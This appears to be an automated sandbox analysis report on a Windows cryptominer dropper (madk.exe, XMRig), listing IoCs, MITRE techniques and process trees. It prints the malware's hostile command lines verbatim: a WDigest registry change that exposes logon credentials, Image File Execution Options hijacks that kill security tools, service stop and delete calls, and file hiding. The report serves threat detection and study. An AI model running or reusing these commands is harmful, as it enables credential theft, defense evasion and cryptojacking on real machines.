xmrig | 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594

Resubmissions

26-09-2022 23:59

220926-318jzsdcgn 10

21-06-2022 21:54

220621-1skf3sgcg9 10

Analysis

max time kernel
151s
max time network
132s
platform
windows7_x64
resource
win7-20220414-en
submitted
21-06-2022 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

madk.exe
Size

3.4MB
MD5

d00af5991807952929e5b986afd295c9
SHA1

7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
SHA256

025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
SHA512

c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6

Score

10^/10

xmrig discovery evasion miner persistence ransomware upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

2664 wevtutil.exe
2640 wevtutil.exe
2616 wevtutil.exe
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

svchost.exerundlls.exe

pid process

2132 svchost.exe
2432 rundlls.exe

pid	process
2664	wevtutil.exe
2640	wevtutil.exe
2616	wevtutil.exe

pid	process
2132	svchost.exe
2432	rundlls.exe

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig
C:\Windows\Fonts\rundlls.exe	xmrig
\Windows\Fonts\rundlls.exe	xmrig
behavioral1/memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig

Executes dropped EXE 13 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exe

pid	process
268	svchost.exe
328	svchost.exe
1392	svchost.exe
2044	svchost.exe
392	svchost.exe
1640	svchost.exe
1796	conhost.exe
2132	svchost.exe
2152	svchost.exe
2180	svchost.exe
2204	svchost.exe
2348	svchost.exe
2432	rundlls.exe

Sets file execution options in registry 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe	reg.exe

Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2272 attrib.exe
1608 attrib.exe
2108 attrib.exe
1108 attrib.exe
384 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2272	attrib.exe
1608	attrib.exe
2108	attrib.exe
1108	attrib.exe
384	attrib.exe

UPX packed file 40 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/1516-94-0x0000000000400000-0x0000000000809000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/268-97-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/328-98-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1392-99-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2044-100-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2044-105-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/268-104-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/392-106-0x0000000140000000-0x0000000140053000-memory.dmp	upx
\??\c:\windows\Fonts\conhost.exe	upx
C:\Windows\Fonts\conhost.exe	upx
behavioral1/memory/1516-128-0x0000000000400000-0x0000000000809000-memory.dmp	upx
behavioral1/memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
behavioral1/memory/1640-132-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2180-152-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2152-151-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2132-153-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1392-154-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2348-158-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2204-155-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2204-163-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
behavioral1/memory/1640-168-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2348-169-0x0000000140000000-0x0000000140053000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

WScript.exe

pid process

840 WScript.exe
Loads dropped DLL 6 IoCs

Processes:

madk.exesvchost.exe

pid process

1516 madk.exe
2172
2196
2240
2300
2348 svchost.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exe

pid process

2392 takeown.exe
1756 takeown.exe
2084 takeown.exe
2364 takeown.exe

pid	process
840	WScript.exe

pid	process
1516	madk.exe
2172
2196
2240
2300
2348	svchost.exe

pid	process
2392	takeown.exe
1756	takeown.exe
2084	takeown.exe
2364	takeown.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.execonhost.exeattrib.exeattrib.exeattrib.exemadk.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\svchost.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\svchost.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\conhost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\lsass.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\WinRing0x64.sys	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\WinRing0x64.sys	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\svchost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts\sqlservr.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts\csrss.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe

Launches sc.exe 23 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2248	sc.exe
2324	sc.exe
864	sc.exe
1960	sc.exe
1460	sc.exe
688	sc.exe
904	sc.exe
2688	sc.exe
2276	sc.exe
2440	sc.exe
832	sc.exe
560	sc.exe
632	sc.exe
1168	sc.exe
1436	sc.exe
2676	sc.exe
2224	sc.exe
2144	sc.exe
580	sc.exe
1652	sc.exe
2176	sc.exe
2168	sc.exe
2500	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with WMI 4 IoCs
evasion

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

892 WMIC.exe
2304 WMIC.exe
2240 WMIC.exe
1172 WMIC.exe

pid	process
892	WMIC.exe
2304	WMIC.exe
2240	WMIC.exe
1172	WMIC.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1588	taskkill.exe
1260	taskkill.exe
832	taskkill.exe
1544	taskkill.exe
520	taskkill.exe
940	taskkill.exe
1960	taskkill.exe
972	taskkill.exe
328	taskkill.exe
1204	taskkill.exe
2440	taskkill.exe
1556	taskkill.exe
1352	taskkill.exe
1412	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

896 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2020 PING.EXE

pid	process
896	reg.exe

pid	process
2020	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exe

pid	process
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe
1796	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	832	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	1544	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1412	taskkill.exe
Token: SeLockMemoryPrivilege	2432	rundlls.exe
Token: SeIncreaseQuotaPrivilege	2304	WMIC.exe
Token: SeSecurityPrivilege	2304	WMIC.exe
Token: SeTakeOwnershipPrivilege	2304	WMIC.exe
Token: SeLoadDriverPrivilege	2304	WMIC.exe
Token: SeSystemProfilePrivilege	2304	WMIC.exe
Token: SeSystemtimePrivilege	2304	WMIC.exe
Token: SeProfSingleProcessPrivilege	2304	WMIC.exe
Token: SeIncBasePriorityPrivilege	2304	WMIC.exe
Token: SeCreatePagefilePrivilege	2304	WMIC.exe
Token: SeBackupPrivilege	2304	WMIC.exe
Token: SeRestorePrivilege	2304	WMIC.exe
Token: SeShutdownPrivilege	2304	WMIC.exe
Token: SeDebugPrivilege	2304	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2304	WMIC.exe
Token: SeRemoteShutdownPrivilege	2304	WMIC.exe
Token: SeUndockPrivilege	2304	WMIC.exe
Token: SeManageVolumePrivilege	2304	WMIC.exe
Token: 33	2304	WMIC.exe
Token: 34	2304	WMIC.exe
Token: 35	2304	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2304	WMIC.exe
Token: SeSecurityPrivilege	2304	WMIC.exe
Token: SeTakeOwnershipPrivilege	2304	WMIC.exe
Token: SeLoadDriverPrivilege	2304	WMIC.exe
Token: SeSystemProfilePrivilege	2304	WMIC.exe
Token: SeSystemtimePrivilege	2304	WMIC.exe
Token: SeProfSingleProcessPrivilege	2304	WMIC.exe
Token: SeIncBasePriorityPrivilege	2304	WMIC.exe
Token: SeCreatePagefilePrivilege	2304	WMIC.exe
Token: SeBackupPrivilege	2304	WMIC.exe
Token: SeRestorePrivilege	2304	WMIC.exe
Token: SeShutdownPrivilege	2304	WMIC.exe
Token: SeDebugPrivilege	2304	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2304	WMIC.exe
Token: SeRemoteShutdownPrivilege	2304	WMIC.exe
Token: SeUndockPrivilege	2304	WMIC.exe
Token: SeManageVolumePrivilege	2304	WMIC.exe
Token: 33	2304	WMIC.exe
Token: 34	2304	WMIC.exe
Token: 35	2304	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundlls.exe

pid process

2432 rundlls.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

madk.execonhost.exe

pid process

1516 madk.exe
1516 madk.exe
1796 conhost.exe
1796 conhost.exe

pid	process
2432	rundlls.exe

pid	process
1516	madk.exe
1516	madk.exe
1796	conhost.exe
1796	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

madk.execmd.exe

description	pid	process	target process
PID 1516 wrote to memory of 1784	1516	madk.exe	cmd.exe
PID 1516 wrote to memory of 1784	1516	madk.exe	cmd.exe
PID 1516 wrote to memory of 1784	1516	madk.exe	cmd.exe
PID 1516 wrote to memory of 1784	1516	madk.exe	cmd.exe
PID 1516 wrote to memory of 896	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 896	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 896	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 896	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 624	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 624	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 624	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 624	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1804	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1804	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1804	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1804	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1216	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1216	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1216	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1216	1516	madk.exe	reg.exe
PID 1784 wrote to memory of 2032	1784	cmd.exe	attrib.exe
PID 1784 wrote to memory of 2032	1784	cmd.exe	attrib.exe
PID 1784 wrote to memory of 2032	1784	cmd.exe	attrib.exe
PID 1784 wrote to memory of 2032	1784	cmd.exe	attrib.exe
PID 1516 wrote to memory of 2028	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 2028	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 2028	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 2028	1516	madk.exe	reg.exe
PID 1516 wrote to memory of 1960	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1960	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1960	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1960	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 560	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 560	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 560	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 560	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 580	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 580	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 580	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 580	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1460	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1460	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1460	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1460	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1652	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1652	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1652	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1652	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 632	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 632	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 632	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 632	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1168	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1168	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1168	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1168	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1436	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1436	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1436	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 1436	1516	madk.exe	sc.exe
PID 1516 wrote to memory of 832	1516	madk.exe	taskkill.exe
PID 1516 wrote to memory of 832	1516	madk.exe	taskkill.exe
PID 1516 wrote to memory of 832	1516	madk.exe	taskkill.exe
PID 1516 wrote to memory of 832	1516	madk.exe	taskkill.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
2496	attrib.exe
1240	attrib.exe
2088	attrib.exe
1508	attrib.exe
2908	attrib.exe
1736	attrib.exe
2356	attrib.exe
2712	attrib.exe
2776	attrib.exe
3056	attrib.exe
2856	attrib.exe
1200	attrib.exe
2680	attrib.exe
2660	attrib.exe
2860	attrib.exe
2084	attrib.exe
2772	attrib.exe
1592	attrib.exe
2284	attrib.exe
2096	attrib.exe
2980	attrib.exe
1708	attrib.exe
2108	attrib.exe
1084	attrib.exe
1280	attrib.exe
1260	attrib.exe
2596	attrib.exe
832	attrib.exe
2092	attrib.exe
2368	attrib.exe
2396	attrib.exe
1324	attrib.exe
696	attrib.exe
864	attrib.exe
2544	attrib.exe
2164	attrib.exe
2396	attrib.exe
1968	attrib.exe
1488	attrib.exe
1512	attrib.exe
1804	attrib.exe
556	attrib.exe
1316	attrib.exe
696	attrib.exe
1240	attrib.exe
2676	attrib.exe
2944	attrib.exe
1892	attrib.exe
1836	attrib.exe
3012	attrib.exe
2788	attrib.exe
2316	attrib.exe
2356	attrib.exe
2336	attrib.exe
2732	attrib.exe
2100	attrib.exe
1692	attrib.exe
1124	attrib.exe
1400	attrib.exe
1236	attrib.exe
1964	attrib.exe
1956	attrib.exe
1160	attrib.exe
2220	attrib.exe

C:\Users\Admin\AppData\Local\Temp\madk.exe
"C:\Users\Admin\AppData\Local\Temp\madk.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
- Drops file in Windows directory
PID:2032

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2⤵
- Modifies registry key
PID:896

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:624

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:1804

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2⤵
PID:2028

C:\Windows\SysWOW64\sc.exe
sc stop MetPipAtcivator
2⤵
- Launches sc.exe
PID:1960

C:\Windows\SysWOW64\sc.exe
sc delete MetPipAtcivator
2⤵
- Launches sc.exe
PID:560

C:\Windows\SysWOW64\sc.exe
sc stop SetPipAtcivator
2⤵
- Launches sc.exe
PID:580

C:\Windows\SysWOW64\sc.exe
sc delete SetPipAtcivator
2⤵
- Launches sc.exe
PID:1460

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMaims
2⤵
- Launches sc.exe
PID:1652

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMaims
2⤵
- Launches sc.exe
PID:632

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMais
2⤵
- Launches sc.exe
